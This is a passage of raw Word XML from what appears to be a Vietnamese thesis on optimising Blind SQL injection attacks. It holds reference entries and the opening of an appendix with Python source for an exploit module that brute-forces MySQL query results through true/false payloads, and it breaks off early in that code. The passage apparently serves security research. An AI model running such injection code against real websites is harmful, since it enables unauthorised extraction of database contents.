    <w:p w:rsidR="0024706B" w:rsidRDefault="0024706B" w:rsidP="00DD02BD">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="001E10B4">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD5844">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Hoàng Quốc Thịnh</w:t>
      </w:r>
      <w:r w:rsidR="00974F49">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2012)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, “</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD5844">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Optimized Blind Sql Injection</w:t>
      </w:r>
      <w:r w:rsidR="00974F49">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>”, Tetcon 2012.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0024706B" w:rsidRPr="0024706B" w:rsidRDefault="0024706B" w:rsidP="00DD02BD">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:i/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="001E10B4">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r w:rsidRPr="002645D4">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Justin Clarke</w:t>
      </w:r>
      <w:r w:rsidR="00974F49">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2012),</w:t>
      </w:r>
      <w:r w:rsidRPr="002645D4">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>“SQL Injection Attacks and Defense, Second Edition 2nd Edition”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00974F49">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Syngress.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F31C4" w:rsidRDefault="007F31C4" w:rsidP="00DD02BD">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:right="-48" w:firstLine="0"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="001E10B4">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E30">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Michal Zalewski</w:t>
      </w:r>
      <w:r w:rsidR="00974F49">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00974F49">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(2012)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E30">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>“The Tangled Web: A Guide to Securing Modern Web Applications 1st Edition”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D919BE">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>No Starch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F31C4" w:rsidRDefault="0024706B" w:rsidP="00DD02BD">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="001E10B4">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r w:rsidR="007F31C4" w:rsidRPr="00B92462">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Roberto Salgado</w:t>
      </w:r>
      <w:r w:rsidR="00974F49">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2013), </w:t>
      </w:r>
      <w:r w:rsidR="007F31C4">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="007F31C4" w:rsidRPr="00B92462">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SQL Injection Optimization and Obfuscation Techniques</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">”, </w:t>
      </w:r>
      <w:r w:rsidR="00974F49">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>BlackHat EU 13</w:t>
      </w:r>
      <w:r w:rsidR="007F31C4">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00325E74" w:rsidRDefault="00325E74">
      <w:pPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:line="252" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760373" w:rsidRDefault="00325E74" w:rsidP="00C93A9C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="134" w:name="_Toc459822528"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>PHỤ LỤC</w:t>
      </w:r>
      <w:bookmarkEnd w:id="134"/>
    </w:p>
    <w:p w:rsidR="00B00A0E" w:rsidRDefault="00325E74" w:rsidP="00346AC0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Mã nguồn các module trong WETK</w:t>
      </w:r>
      <w:r w:rsidR="00346AC0">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> được sử dụng để thực nghiệm tối ưu hóa tấn công Blind SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00325E74" w:rsidRPr="001C48BA" w:rsidRDefault="00325E74" w:rsidP="00FC6730">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="135" w:name="_Toc459822529"/>
      <w:r w:rsidRPr="001C48BA">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Module Blind SQL injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="135"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9288"/>
      </w:tblGrid>
      <w:tr w:rsidR="00325E74" w:rsidTr="00325E74">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9288" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:t>#!/usr/bin/python</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:t>#author: namhb</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:t>import sys, os, string</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:t>from libs.coreHTTPModule import coreHTTPModule</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:t># Load core module</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:t>class module(coreHTTPModule):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>def __init__(self, logger, profile):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>coreHTTPModule.__init__(self, logger, profile)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>self.name</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>"Blind SQL injection Module"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t xml:space="preserve">self.description </w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>"Blind SQL injection with brute force character ( greater than 100 requests/character)"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>self.rank</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>"HIGH"</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t># Exploit level</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>self.type</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>"Exploit"</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t># Type: exploit | scanner | support</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>self.author</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>"namhb"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>self.version</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>"0.0.1"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t xml:space="preserve">self.maxLength </w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>255</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t xml:space="preserve"># self.resultLength </w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>None</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t xml:space="preserve">self.resultLength </w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t xml:space="preserve">self.result </w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>""</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t xml:space="preserve">self.basicOptions["PATTERN"] </w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>"currentSetting"</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>None,</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>"required"</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>True,</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>"description"</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>"Pattern to check True/False"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t xml:space="preserve">self.payload </w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>"if({0},1,0)"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>def getMySQLLength(self, query):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>for i in range(0, self.maxLength):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:lastRenderedPageBreak/>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t># Payload: 1 and and length(version)=i</w:t>
            </w:r>
          </w:p>
